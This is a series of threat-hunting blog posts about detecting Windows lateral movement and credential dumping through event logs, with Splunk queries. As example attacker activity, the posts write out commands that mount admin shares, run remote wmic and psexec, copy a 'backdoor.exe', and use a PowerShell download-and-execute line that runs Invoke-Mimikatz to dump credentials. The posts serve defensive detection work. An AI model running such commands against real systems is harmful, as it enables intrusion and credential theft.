Friday, December 8, 2017

A Few of My Favorite Things - Continued

In my last post I talked a lot about how I think about finding bad guys.  From creating mind maps of the things I should be looking for to the need for moving beyond simple IOC based detection and into more of a dynamic environment where alerts are clusters of events that are linked by time, source / destination / user.  I also described a simple scenario of the actions that an attacker could take to dump credentials on a host and how those actions would map across the needs of an adversary.  In this post I want to focus less on the thinking aspect and more on the doing.  
To recap the scenario from my last post:

  1. Attacker mounts C$ share on a remote machine
  2. Attacker copies malicious batch script to the mapped share
  3. Attacker issues wmic command to execute batch script on remote machine
  4. Batch script executes powershell that will download and execute invoke-mimikatz
  5. File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem. 

The above actions taken by the attacker would fall into the maps under the following:

Network Logon: Mounting Share
Data Movement 
Admin Shares: Copy .bat script
WMIC: Execute against remote machines
Rare Explicit logon
Data Movement
HTTP: Download of tool
DLL Loading
Powershell: Command Arguments
Data Movement
Copy: Dump File

The following are the commands that were executed:

  1. net use z: \\\c$ /user:admin1
  2. copy bad.bat z:\temp\bad.bat
  3. wmic /node:”” /user:”\admin1” /password:”Th1sisa-Test” process call create “cmd.exe /c c:\temp\bad.bat”
  4. copy z:\bad.temp .\bad.temp

Based on the above command sequence, what are some questions that you would ask as a result?   

  1. When admins administer remote servers, do they typically use cmd.exe/wmic.exe/powershell.exe to issue commands or do they use some type of remote desktop solution the majority of the time?
  2. When admins administer remote servers do they typically use ip addresses in their commands instead of hostnames?
  3. What is the volume of remote logins from this source machine?
  4. What is the volume of remote logins from this user?
  5. How often has this source machine mounted the C$ share on a remote machine?
  6. How often has this user mounted the C$ share on a remote machine?
  7. How often has the destination machine had the C$ share mounted?
  8. How often is the copy command used to copy batch scripts to the C$ share of a remote machine?
  9. Is it common for an admin to use WMIC to connect to and issue commands on a remote machine?
  10. If the majority of these are common practice in your environment, is this cluster of events common?

Below are the contents of bad.bat and the same question applies.  What are some of the things you could key off of in order to possibly build some detection?

@echo off
powershell.exe “IEX (New-Object Net.WebClient).Downloadstring(‘'); Invoke-Mimikatz -DumpCreds" >> c:\bad.temp

  1. How often does powershell initiate a web request?
  2. Have we seen a command like this in the past?
  3. Have we seen the destination web server previously in a powershell command?
  4. How can we tell if Invoke-Mimikatz was executed?

This is good.  We have several things that we can go after to begin to build out some behavioral based detection.  As we start creating queries for the above, keep in mind that you may need to use multiple log sources.  If this is the case do yourself a favor and try to normalize the fields.  It’s much easier to pivot and correlate across log sources when the fields are the same.

The obvious next step in our process would be to start building the queries out, but before we begin with that we need to understand our infrastructure, how these queries may perform and if there will be any impact as a result of scheduling these to run regularly.  I have had the displeasure of working on some systems in the past where the query would have taken longer to run than the needed time span in scheduling.  If this is the case, is there anything you can do to streamline your searches?  Strictly speaking about Splunk, there is a method to create data models from log sourcetypes.  The result of this is a dramatic increase of speed when building complex queries that look across large amounts of data.  It may be worth investigating the tool you are working with to see if there is a similar option.

Also keep in mind that the above is just one single action that could be taken by an attacker during an intrusion.  If these actions were part of an active intrusion there would likely be many more opportunities for detection.  The queries that we will be creating are building blocks that can be used to start surfacing behaviors.  These building blocks are likely valid for many other behaviors that may be taken during the course of an intrusion.  The more building blocks you have the better your visibility into behaviors becomes.  The more log sources that are queried and used for building blocks the more context your alerts will have.   By clustering these building blocks and identifying the anomalous (actions, src, dest, user) you have a very good chance of spotting what otherwise may have been missed.

For these examples I’m using Windows event logs and Sysmon logs because that is what I have logging in my lab.  I know that company logging policies and standards are all over the place or even non existent.  Detection and logging tools are different.  These examples won’t match what your environment looks like.  The trick is to determine what you can detect with the log sources and the tools you have available.  Detection and hunting is not easy.  Know your tools as well as your data and be creative in how you go about hunting for bad guys.  It’s an art! 

I know that not everyone who will be reading this is a Splunk user, so I'm including key items that you can look for in your logs, but not the specific queries.  If there is enough people asking I may include them in a separate blog post.

4624 Type 3 Logon

As adversaries move around your network they will often use builtin windows tools for this, such as “net” commands.  These commands will generate a 4624 Type 3 network logon.  Attackers will also likely stray from normal logon patterns within your environment.  Logon times, users and src/dest combinations may look different.  By looking for rare combinations where there is a remote IP address you may be able to reduce some of the noise while still identifying those events that should be investigated.

Log Source: Windows Security Events

Command line with ip

If you have command line process audit logging within your environment it may be useful to determine how your admins administer remote machines.  Do they typically connect to them by IP address or hostname.  By knowing what is normal within your network, it is much easier to develop queries that will surface the abnormal.

Log Source: Sysmon
Regex CommandLine="[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}”

C$ share identified in command line

Using windows shares is an easy way for an attacker to move data around.  Whether it’s tools that have been brought in, or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares.  Is this a rare occurrence for this machine/user or combination of both?  Also pay attention to the process responsible for accessing the share and what the action is.

Log Source: Sysmon

HTTP request via powershell

This goes along with knowing your environment.  Is it normal for powershell to invoke a web request?  If the answer is yes, are the destinations unique?  By looking for unique destinations that were the result of powershell invoking a web request you have a high likelihood of spotting a malicious command.

Log Source: Sysmon

Data movement dest to source

Similar to the $ share behavior.  Whether it’s tools that have been brought in, or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares and the data that is passed between them.  Is this a rare occurrence for this machine/user or combination of both?  

Log Source: Windows Security Events
Access_Mask=0x120089) within 1 second

Data movement source to dest

Similar to the $ share behavior.  Whether it’s tools that have been brought in, or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares and the data that is passed between them.  Is this a rare occurrence for this machine/user or combination of both?

Log Source: Windows Security Events
Access_Mask=0x130197) within 1 second

Remote WMIC

Execution is an attacker need.  We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine.  Pay attention to source/dest/user combinations and the processes that are spawned on the remote machine.  This query is intended to identify the processes that are spawned within 1 second of wmiprvse executing on the destination side of the wmic command.  This query will also attempt to identify the source of the wmic connection.

Log Source: Windows Security Events

Sub Search

Display source address and all processes spawned in that 1 second span.

WMIC 4648 login

Execution is an attacker need.  We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine.  By monitoring explicit logons you can identify users, machines and processes that were used which resulted in an authentication to a remote machine.  This query watches for processes that may often be used during lateral movement.

Log Source: Windows Security Events

Process spawned from cmd.exe

Cmd.exe is probably the most executed process by an attacker during KC7.  Monitor child processes and identify those clusters that may be related to malicious execution.

Log Source: Sysmon

Mounting remote $ share

Using windows shares is an easy way for an attacker to move data around.  Whether it’s tools that have been brought in, or data intended for exfiltration.  Pay attention to machines and users accessing hidden shares.  Is this a rare occurrence for this machine/user or combination of both?  

Log Source: Windows Security Events
Event Code=5140

Possible credential dumper execution

Attackers need credentials if they are going to move laterally.  Identifying the potential execution of a credential dumper is important as they can often be missed by AV.  This query looks at the loading of dll’s by process and identifies those that have the clusters often used together by various credential dumping tools.

Log Source: Sysmon
ImageLoaded=msv1_0.dll) > 2 by process

Our next step would be to begin correlating the results of these queries, but unfortunately with using a Splunk free license, the ability to generate alerts will expire after 30 days.  The alerts are needed in order to log the output of your queries to a separate index from which we would be doing our correlation.  I have previously blogged about using queries such as the above and building correlation around them.  This post can be found here:

The above queries are the building blocks that will be used as part of a more dynamic behavioral based detection methodology.  As you continue to build out and correlate queries based on actions that adversaries take, the more your capability increases in finding previously undetected TTP’s.

I wasn't able to include screenshots of each query as the post, I believe, exceeded the maximum size.  I am including a couple screenshots of the results of the queries though.  If these queries were correlated into a single alert it should paint a pretty good picture that this is very bad.

Sunday, November 26, 2017

A Few Of My Favorite Things

Today I want to talk about a couple of my favorite things.  Finding bad guys and thinking about finding bad guys.  When I talk about “thinking" I don’t mean fantasizing about the act of finding a successful intrusion, but rather, what steps do I need to incorporate or modify that will increase my chances of locating evil on my network.  I’ve actually been wanting to write this post for a while and I finally got a bit of motivation after a few tweets this past week.

I believe attackers will always leave traces of their activity.  No matter how subtle the indicators may be, it is our job to be able to find and interpret those so that we can respond accordingly.  So the question is, how do we go about finding these indications that attackers are in our network?  To answer this question I think it helps to focus our thoughts in a way that will help us understand relationships between the things we are trying to identify.  By focusing on these relationships we can then begin to surface patterns in our data.  Sitting down and mapping out the things you know about adversary activity is a great place to start.  I think it should be said that I don’t care about mapping the TTP’s of a specific actor at this point.  I simply want to lump everything together so that I can get an idea of the things I should be looking for and what is the state of my detection at this point in time.  To aid us in this quest we can pull data from internal response actions that we’ve performed, public reporting, private sharing or even hunches that we have (don’t ever discount these).  Aside from internal response actions, one of the best sources for this type of data gathering is definitely Mitre’s ATT&CK Framework.  There is a wealth of information in the framework as well as their Cyber Analytic Repository.  

Earlier this year, as I was recovering from open heart surgery, I felt like I needed a project to keep my mind busy so I sat down and did just what I described above.  I took a look at what I knew as well as what I could find regarding KC7 activity and mapped those actions to, what I see as, adversary needs.  It was a really good exercise in my opinion.  It not only helped me focus on the things I should be looking for, but visually be able to see my ability to map behaviors through multiple stages of an intrusion.  I tweeted these maps earlier this year which can be found here:

Next we need to understand what logs we have available as well as how to interpret these logs.  Do you know the above actions well enough to know what a positive example would look like in logs that you have?  If the answer is no, prepare to spend some time testing.  Do you know these log sources well enough to know what you can and can’t detect in them (note that surfacing a single action may very well be a correlated event that spans multiple log sources). If the answer is no, prepare to spend some time in them.  Keep in mind that we can often surface needed data by writing rules in our existing tools to log whenever a certain event has been identified.  I believe this is a great way to maximize the use of our current logs.  Don’t forget to consider both the source and destination when trying to determine what can and can’t be found.  For actions that can’t be detected due to gaps in coverage, make sure to document these as well as a log source or sources that would provide the needed visibility (be ready to provide management with a solution to a problem).

So if you set out to create detection for credential theft and only wanted to look for static indicators you could do that.  You could write detection for, and alert on AV threat names, service names, or specific filenames, but ask yourself, why do adversaries keep going back to these tools?  Because, for various reasons, they work and go undetected a large percentage of the time.  I am no way saying that it's a waste of time to try and detect those static ioc’s.  We should, hands down, have detection and alerting for those.  But when we have completed that task we shouldn’t assume that we are finished.   There is much more that can be done.  Lets take a look at a sample scenario involving invoke-mimikatz.

  1. Attacker mounts C$ share on a remote machine
  2. Attacker copies malicious batch script to the mapped share
  3. Attacker issues wmic command to execute batch script on remote machine
  4. Batch script executes powershell that will download and execute invoke-mimikatz
  5. File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem. 

The above actions taken by the attacker would fall into the maps under the following:
Network Logon: Mounting Share
Data Movement 
Admin Shares: Copy .bat script
WMIC: Execute against remote machines
Rare Explicit logon
Data Movement
HTTP: Download of tool
DLL Loading
Powershell: Command Arguments
Data Movement
Copy: Dump File

As you can see, the act of dumping credentials involved 4 out of 5 needs.  It should also be noted that not one of the above detections is specifically related to finding Invoke-Mimikatz, but instead related to surfacing an action (or building block) with the intent of bubbling up a malicious chain of events.  The more effort that is put into defining, gaining visibility and alerting on these building blocks, the more dynamic your detection may become.  By looking for clusters of events across multiple needs you should be able to quickly spot anomalous activity.  

Saturday, April 29, 2017

Billions and Billions of Logs; Oh My

As I’m sure many of you know, I was scheduled to talk at a couple of different conferences (SANS Threat Hunting Summit and x33fcon), but was unable to due to needing open heart surgery.  Not wanting all of the preparation work for these conferences to go to waste, I posted the slides here: (If you have not looked at these slides I would suggest that you do before continuing).  After posting, I received some great response to the slides and wanted to do a blog post discussing a few of my thoughts since I doubt I will ever give the presentation.  I also wanted to exercise my mind a bit by focusing on one of the things that I love to do (hunting).  I’ve been exercising my body everyday and it has responded well so the same should be true for my mind, right?

We know that companies are consuming huge amounts of data and that the people tasked with hunting through these logs often struggle with the volume.  The question is: How do we, as hunters and defenders, navigate this sea of data and still be able to find what our current detection technologies aren’t finding? This is not an easy task, but I think a lot of it comes down to the questions that we ask.

What am I looking for?
I think often we may try and generalize the things we are hunting for.  This generalization can lead to broader queries and introduce vast amounts of uneeded logs into your results.  Know exactly what it is that you are looking for and, to the best of your knowledge, what it would look like in the logs that you have.  Keep in mind that the smaller that “thing" is that you are trying to find, the more focused your query can become.
Why am I looking for it?
Define what is important to your org and scope your hunts accordingly.  Once you define what you will be hunting, break that down into smaller pieces and tackle those one at a time.  Prioritize and continue to iterate through your defined process.

How do I find it?
Don’t get tunnel vision.  If your queries are producing far to many results, know that this will be very difficult to transition to automated alerting.  Can you look at the problem you are trying to solve differently and therefore produce different results? This is, by the way, the topic for the rest of this post.

If I look at KC7 for example.  Often times the actions that attackers take are the same actions taken legitimately by users millions upon millions of times a day.  From authenticating to a domain controller to mounting a network share, these are legitimate actions that can be seen every minute of every day on a normal network.  These can also be signs of malicious activity.  So how can we tell the difference?  This is where looking at the problem differently comes into play.  Before we delve into that though we need to look at attackers and how they may operate.  We can then use what we may think we know about them to our advantage.

I used the following hypothesis in my slides and I think you would often see some or all of them in the majority of intrusions.

  1. Comprised of multiple actions.
  2. Actions typically happen over short time spans.
  3. Will often use legitimate windows utilities.
  4. Will often use tools brought in with them.
  5. Will often need to elevate permissions.
  6. Will need to access multiple machines.
  7. Will need to access files on a filesystem. 

Based on the above hypothesis we are able to derive attacker needs.

  1. Execution
  2. Credentials
  3. Enumeration
  4. Authentication
  5. Data Movement

I also know that during an active intrusion, attackers are very goal focused.  Their actions typically can be associated with one of the above needs and you may see multiple needs from a single entity in very short time spans.  If you contrast that to how a normal user looks on a network the behavior is typically very different.  We can use these differences to our advantage and instead of looking for actions that would likely produce millions of results, we can look for patterns of behaviors that fall into multiple needs.   By looking for indications of needs and chaining them together by time and an additional common entity, such as source host, destination host, user, we can greatly reduce the amount of data we need to hunt through.  

So how do we get there?
  1. Develop queries for specific actions based on attacker needs
            a. Accuracy of query is key
            b. Volume of output is not
  1. Enhance data with queries from detection technologies
  2. Store output of queries in central location
  3. Each query makes a link
  4. The sum of links make up a chain

Attackers will continue to operate in our environments and the amount of data the we collect will continue to grow.  Being able to come up with creative ways to utilize this data and still find evil is essential.  I would love to know your thoughts on this or if you have other ways of dealing with billions and billions of logs.  Feel free to reach out in the comment section or on twitter @jackcr.

I would also like to thank everyone who has reached out to me over the past weeks.  You are all awesome and have helped and inspired me more than you will ever know.  I can’t thank you all enough.  I would also like to thank SANS and x33fcon for giving me the opportunity to speak and for being amazing when I had to cancel! 

Thursday, February 23, 2017

Hunting for Chains

In my last blog post I touched on something that I want to talk more about.  I think far too often, when hunting, we can focus on single indications for signs of something being bad.  Intrusions are far more than a single event though, so why spend all of your time hunting that way?  Often the actions that an attacker will take will be in short time bursts.  These bursts may only last for a few seconds to a few minutes.  Looking for multiple events within these windows of time, I feel, can be a very effective way to spend your time.

One of the things I try and do with my blog is to share how I think about the work that I do.  I have gained so much knowledge from others over the years and feel strongly about giving back.  Lately I have been thinking a lot about , what I like to call, behavior chains.  Basically these are the actions that an attacker would likely take to accomplish their goal.  Each action is a link and the sum of actions make up the chain.  A link can be something as simple as a process name like net.exe or cmd.exe (these are probably 2 of the most commonly spawned processes and attackers definitely take advantage of these).  A link can also be something as complex as a correlation search that surfaces a specific behavior (see my last blog post for some of these correlations).  So why do I care about looking at hunting this way? There are multiple reasons, but a few of them are to model how attackers may operate, data reduction and higher fidelity output.

Lets say that we want to look for odd network logon behavior because we know that when an attacker is active in our environment they will generate anomalous 4624 type 3 events.  The problem with this is that there is likely thousands upon thousands, if not millions, of these events per day.  We could try and reduce this data by looking for rare occurrences of source machine, dest machine, user or a combination of the three. This will likely produce anomalies, but will also take time to investigate each one.  Now take that time and multiply it by the number of days in a week.  How much time are you spending looking at these events and are the results beneficial?

I think the question to ask is what are the things an attacker would do that would generate these logon events.  We know that just by the meaning of the event that it was the result of an action taken by a remote machine and we probably care more about the action than the logon itself.  We can also assume that we would be trying to identify KC7 type of activity so lets break that down into different categories that may likely generate these types of events.  I’ll also include a couple of sample commands for each one.
  1. Recon / Enumeration
    1. net group “domain admins” /domain
    2. net view /domain
  2. Command Execution
    1. psexec -accepteula \\ ipconfig
    2. wmic /node: /user:administrator /password:supersecret process call create "cmd.exe /c ipconfig" 
  3. Data Movement
    1. copy backdoor.exe \\\c$\windows\temp\backdoor.exe
    2. net use x: \\\c$ /user:administrator “superscecret”

Seeing the above commands should obviously raise some alarms, but often it can be difficult to distinguish bad from legitimate activity.  I’ve personally chased many admins over the years.  The difficulty can be raised by how you craft your queries, the amount of data that’s returned and your ability to identify anomalies.  I think we can also limit ourselves based on truly understanding what we are looking for, the log sources we have available and what we perceive as our limitations to meld the two together.  I should say that I don’t have command line process audit logging enabled, but am still able to accurately identify the actions of the above commands based on the logs generated on the destination machine or the domain controller.

When I began looking into the best way to identify these chains I knew that there would be numerous actions that I would want to be bale to identify and that I would want to have some freedom in how I was able to search the data.  Being able to correlate based on source user, dest user, source machine, dest machine, process or any other pivot point that the data provided was very important.  I also wanted to be able to look across different windows of time and to easily incorporate multiple data sources.

I’ll explain what was accomplished using Splunk.  If you want to explore this and you are not a Splunk user, my hope is that you will be able to use the thought behind the technology and incorporate it into a solution that you have available.  

  1. Scheduled queries for specific behaviors are sent to a summary index to house only interesting data.
  2. Custom event types are created for broader queries (logon types, process names…).
  3. Normalized field names for pivoting through data.  This can be important when searching or displaying fields from multiple log sources.

The screen shots below show 2 different dates.  The first clusters of events on 2/21 are the results of running the following commands on my domain controller (95N).
    net view \\
    net group “domain admins” /domain
    net use x: \\\c$ /user:administrator “password”

The second cluster of events on 2/23 are the results of copying a batch script to a member server and executing it.  The contents of the batch script were:
    net group “domain admins” /domain >> data.txt
    netstat -an >> data.out
    ipconfig >> data.out

By ComputerName

By Source IP

I know that this may be an overly simplistic view, but I believe that it shows the value of trying to create chains of events.  If someone was looking at each action individually they may be easily glossed over, but when combining them you may begin to see clusters of anomalous behavior.  The more of these individual actions you can include in your data collection the greater chance you have of surfacing these anomalies.

The power of this is not the technology, but the effort you put into your methods and analysis.  Also, I’m not at all saying that you should stop looking for single events that point to malicious activity, but think of this as simply another arrow you can put in your quiver.

As always, I would love to hear your thoughts.  Feel free to use the comment section below or reach out to me on twitter @jackcr. 

Saturday, February 11, 2017

Patterns of Behavior

If you have been in security for any length of time then you have probably seen David Bianco’s Pyramid of Pain.  One of the thoughts behind the pyramid is that the higher up you go the more cost to the adversary you bring.  The top of the pyramid is where we really want to be as it’s much harder for an adversary to change how they operate and we, as defenders, can make it very difficult for them to carry out their operations if we can begin to find them at these upper levels.. 

I said yesterday in a tweet that a goal of mine is to be able to track an entire intrusion simply by the alerts that I generate.  While that tweet may be a little far fetched, the sentiment behind the tweet is not.  I want to know as much as I can about attacker activity so that I can effectively build a web of detection.  The bigger and tighter the web, the more chances I will have to identify patterns that would be indicative of attacker activity.  By studying past attacks, public reporting and any peer sharing I can shape the things that I should be going after.

Lets say that we have a fictitious actor that we are tracking that we’re calling FridayFun.  Lets also say that we have been tracking FridayFun since 2012 when we initially responded to them HERE (Note: This is a link to the download of a memory forensics challenge I created in 2012).  During the course of time we have identified some of the following regarding techniques used for Kill Chain 7 activity.
  1. The use of net commands for enumeration and lateral movement.
  2. The scheduling of remote tasks.
  3. The use of psexec for tool execution.
  4. Copying of files via command line.

Lets take a look at each of the above and how we may be able to find it in the Windows security events.  Note that these methods require additional windows logging.  I’m also including Splunk searches that can be used to find this behavior.  If you aren’t a Splunk user, my hope is that you can take these queries and incorporate them into a solution or method you have available.

We have identified FridayFun often copying files to $ shares via the command line as in the example below.
copy thisisbad.bat \\\c$\windows\thisisbad.bat

When a file is copied via the command the logs produced are different than if you were to copy them via Windows Explorer.  Both methods produce multiple file share access events, but the Access Masks are different depending on method. From the command line, theses are the unique values:

The following query will identify the 3 unique access masks being created within the same second on a single machine.  

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100180 OR Access_Mask=0x80 OR Access_Mask=0x130197) |bucket span=1s _time |rex "(?<thingtype>(0x100180|0x80|0x130197))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

For the scheduling of remote tasks, lets say that we have identified a pattern of behavior each time FridayFun has utilized this tactic.
  1. Query the remote machine for the local time (think about machines in different time zones).
  2. The remote task is created.
  3. The source machine queries the scheduled task on the remote machine.
This command sequence may look like:
  1. net time \\
  2. at \\ 03:25 c:\windows\thisisbad.bat
  3. at \\

The net time command and remote At query will both a produce a 5145 file share event where the IPC$ is the share being accessed.  The Access Mask for these 2 events will be 0x12019f.  The Relative Target Name will be different.  A srvsvc named pipe will be created for the net time command while an atsvc named pipe will be created for the At query.  For the creation of the scheduled task we are looking for 4698 events and specifically looking for At jobs in the Task Name.

The following query will identify the above 3 events occurring within an hour time frame on a single machine.

sourcetype=wineventlog:security (EventCode=4698 Task_Name=\\At*) OR (EventCode=5145 Object_Type=File Share_Name=*IPC$ Access_Mask=0x12019f (Relative_Target_Name=srvsvc OR Relative_Target_Name=atsvc)) |bucket span=1h _time |rex "(?<thingtype>(\\\\At.|srvsvc|atsvc))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Task_Name) AS Task_Name, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

Friday fun often utilizes psexec to aid in execution on remote machines.  We have identified them using commands such as the following:

psexec -accepteula \\ -c gsecdump.exe

When looking for psexec being executed I have found that it may be more beneficial to look for indications on the destination side.  Psexec can often be renamed and may be harder to identify on the source if you aren’t able to log the FileDescription metadata field of the binary when it executes.  On the destination side a 5145 event will be created where the share name is ADMIN$ and the Relative Target Name is PSEXESVC.EXE.  We are also looking for any new process creation within that same second to identify what psexec executed on the destination machine (Note: when psexec copies a file and executes it , it will be spawned from the IPC$ share).

This behavior can be identified by the following query.

sourcetype=wineventlog:security ((EventCode=4688 New_Process_Name!=*\\PSEXESVC.EXE New_Process_Name!=*\\conhost.exe New_Process_Name!=*\\dllhost.exe) OR (EventCode=5145 Share_Name=*ADMIN$ Relative_Target_Name=PSEXESVC.EXE)) |bucket span=1s _time |rex "(?<thingtype>(4688|PSEXESVC))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, values(New_Process_Name) AS New_Process_Name, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=2

Copying files from the destination to the source machine will produce different logs than if I were to copy files from the source to the destination.  FridayFun has used commands such as the following.

copy \\\c$\windows\system32\1.txt .\1.txt

This method is much like the first query with the exception of the Access Masks.  The following query can be used to identify this behavior.

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100081 OR Access_Mask=0x80 OR Access_Mask=0x120089)  |bucket span=1s _time |rex "(?<thingtype>(0x100081|0x80|0x120089))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

For those that like dashboards, I created the following to show what the output would look like.

As a defender, i think far too often we are focused on singular events that will give us that "ah ha" moment.  Sure, there are some that may be a dead giveaway of a malicious actor operating in our environment, but I think often singular alerts are valued by their true to false positive ratio.  With the method I showed above I can look for specific behavior, regardless of noise, and bucket events into previously identified attacker activity.  When the number of unique events meets a certain value based on source, destination or user I can then raise an alarm.  The more behavior that I can identify and query for, the larger my web becomes.  I don’t know that I will ever be able to piece together wan entire intrusion by the alerts I generate, but I at least want to make it extremely difficult for any adversary to be able to operate freely in my environment. 

I would love to hear any comments.  You can find me on twitter under @jackcr. 

Monday, January 30, 2017

Hunting: What does it look like?

Its been a while since Ive posted anything and wanted to get this out.  Partly because of an article that I read that talks about how attackers may move laterally within your network.  The other reason is because I think it really shows what you can do with windows event logs (provided you have certain logging enabled) to identify anomalous behavior.

We know that attackers will often use built-in operating system utilities to facilitate host/user enumeration and lateral movement (if you want to dig more into what I will be talking about I would suggest starting here  I have previously made the recommendation that if you have command line process auditing enabled to focus much attention on the system32/syswow64 directories.  Looking for rare or fist seen command line arguments from processes that are spawned from these directories can, at times, point to malicious behavior when lateral movement is involved.  If attackers have brought tools in with them to facilitate enumeration or lateral movement this method can become much more difficult as the command line arguments may be unknown and simply glossed over.  If we flip this around though and look at effects of enumeration on the destination side we may be able to spot what may have otherwise been missed.

I am a big advocate of looking for the same things multiple ways and in different log sources.  There are times where logging events fail due to network issues, application issues…  Having layers of coverage is a good idea, imho, and this includes trying to identify the same activity on both source and destination machines.

Now for the article which you can read here:  The author does a good job of describing some of the tools and methods that may be employed by an attacker, but falls short when it comes to discussing how to find indications of this behavior.  Instead they make the statement "With an assumed-breach mindset, we assume the attacker has already breached the perimeter and is on the network. Unfortunately, this is when the adversary goes dark to the defender, as the attacker has already breached network defenses as well as antivirus.  If you have the necessary logging enabled, I don’t believe they need to go dark. 

If we dive into what they describe they first talk about the “net user” and “net group” commands.  How might these look to a defender?

    net user administrator /domain
    Event Code: 4661
    Object Type: SAM_USER
    Object Name: S-1-5-21-*-500 (* represents domain)
    Access Mask: 0x2d 
Note: In my testing, users in the Domain Admins group will display a SID.  Other users will not. The exception is the Guest and krbtgt accounts.  I would also pay attention to the krbtgt SID S-1-5-21-*-502.  I would think that it would be very odd to see this and may indicate an attacker is intending to use Golden Tickets.

    net group “Domain Admins” /domain
    Event Code: 4661
    Object Type: SAM_GROUP
    Object Name: S-1-5-21-*-512
    Access Mask: 0x2d
Note: Also pay attention to the Enterprise Admins group with the SID of S-1-5-21-*-519

The following can be used to identify PowerSploit’s Get-NetSession, Get-NetShare, netsess.exe and net view.  The net view command may look something like "net view \\".

    Event Code: 5145
    Relative Target Name: srvsvc
    Share Name: IPC$
    Access_Mask: 0x12019f
Note: These events may be very loud.  I would suggest looking for a single source creating srvsvc pipes on multiple machines within a specified time frame.  This may be indicative of enumeration activity.

The article goes on to talk about the use of mimikatz and the use of hashes and kerberos tickets.  

One method I have found to identify an attacker obtaining hashes through lsadump is to look for the following.  I have also found this to be a pretty accurate indicator and would suggest, if you have these logs, to monitor for this event.
    Event Code: 4656
    Object Type: SAM_DOMAIN
    Process Name: lsass.exe
    Access Mask: 0x705

For kerberos ticket theft, I have not found an accurate way to identify this in the event logs, but when executed with mimikatz there will be files written with the .kirbi extension.  If an attacker was using WCE there would be two files created named wce_ccache and wce_krbtkts.  These files can obviously be renamed, but If you have the ability to monitor file creations I would recommend including all of these and hopefully catch when they are dropped on the file system and before renaming.

With respect to the article, I would like to thank Microsoft for putting it out.  I believe that more should release what attackers are doing so that people can focus attention to what is being used.  I see a lot of threat hunting providers say you need it, but don’t share any of what they look for or why they look for it.  I hope those that do this choose to share more in the future.

I would love to hear what others are doing with regards to hunting for and detecting the above.  Finding innovative ways to hunt for bad guys is what I’m passionate about so please share in the comments section. 

Wednesday, November 23, 2016

The Hunting Cycle and Measuring Success

I typically write about the technical aspects of hunting, but wanted to do something different here as a result of a conversation I had a while back which was spurred from this tweet:  While I strongly agree that hunters should be hunting and not building power points or driving projects, I also don’t believe many functions in business have an open ended budget and at some point you will need to justify your work or even value to the company.

So how do we measure success?  Before answering that question, I believe it’s important to define the various stages of hunting (from my perspective).  By defining the process I believe it will be much easier to see where we can point to areas of success, regardless if you come away empty handed or not on a hunt.

From my experience, here are the different stages of a typical hunting cycle.

Define:  In my opinion, hunts are more successful when focused on a task.  One way to do this is to define a general topic and then list the ways that an attacker may take advantage of that topic.  As an example, lets say that we want to focus a hunt on persistence mechanisms. What are the different ways that persistence can be maintained? 
  1. Services
  2. Scheduled tasks
  3. Load order hijacking
  4. Run keys
  5. Startup folder
  6. Valid credentials for externally facing devices
  7. VPN access 

Research:  Based on the above topics, do we know enough about each one to be able to successfully identify what malicious instances may look like?  Are there other methods that can be used to identify the above topics other than what we already know about?  In a lot of cases we are aware that attackers are using $method, but we simply don’t know enough about the topic to be able to look for $method as an indicator of malicious activity.  It’s ok if you don’t know (I’m in that boat a lot) and the researching / learning part is actually kind of fun.    

Availability:  Once we have our list assembled, do we have the data available to be able to find what we are looking for?  If not, is it something that we have the ability to collect?

Develop:  Here is the big one.  Can we assemble queries that will reliably identify the activity while keeping the volume and false positive rates very low?  If these queries will be transitioned to another team to operationalize, then maintaining analyst confidence in the data output is very important.  This confidence can be undermined by the quality and quantity of data being presented to them.

Automate:  Queries that have a high likelihood of being transitioned or those that may be candidates for further development should be scheduled for routine runs.  Seeing the output on a regular basis may give you insight into further improvement.

Knowledge Transfer:  When going through this process you have likely learned more about the topic then when you first began.  Little nuances in data me be a strong indicator that something is amiss and may be the entire reason for the query.  Don’t assume that the person sitting next to you will know the reasoning behind the data.  Document each hunt that will be transitioned and include your thought process behind each one. 

Operationalize:  If this data will be consumed by another team, provide recommendations on scheduling, alerting, and actions related to positive results.  Remember that this team will need to consume it into their existing processes, but you likely have the most experience behind the query and it may be good practice to give them insight into your expertise with it.  It’s also a good idea to create a feedback loop where modifications or enhancements can be requested or proposed.

Track:  These hunts may not initially prove to be valuable, but over time they may show to be very effective at identifying malicious behavior.  Being able to track the good and the bad is important from a team perspective.  They may give you insight into areas that need improvement from a methodology or data standpoint.  You may also find areas where you are doing well and can toot you horn for impacting an adversary's ability to operate in your environment.

So the next question is how do we measure success.  With all of the work that goes into a single hunt, I don’t think that the only measurement is if you find an intrusion during the above process.  Sure, that’s the ultimate goal, but if that’s what hinges on your existence then I feel bad for you.  Some things to look at that can show the value of all the work that you are doing are:

  1. Number of incidents by severity
  2. Number of compromised hosts by severity
  3. Dwell time of any incidents discovered
  4. Number of detection gaps filled
  5. Logging gaps identified and corrected
  6. Vulnerabilities identified
  7. Insecure practices identified and corrected
  8. Number of hunts transitioned
  9. False positive rate of transitioned hunts
  10. Any new visibility gained

Threat hunting can have a very positive impact on the security posture of a company and being able to show this value is important.   Of course we all want to find that massive intrusion, but there is a lot that goes into this so don’t sell yourself short when asked to justify what you do for your company!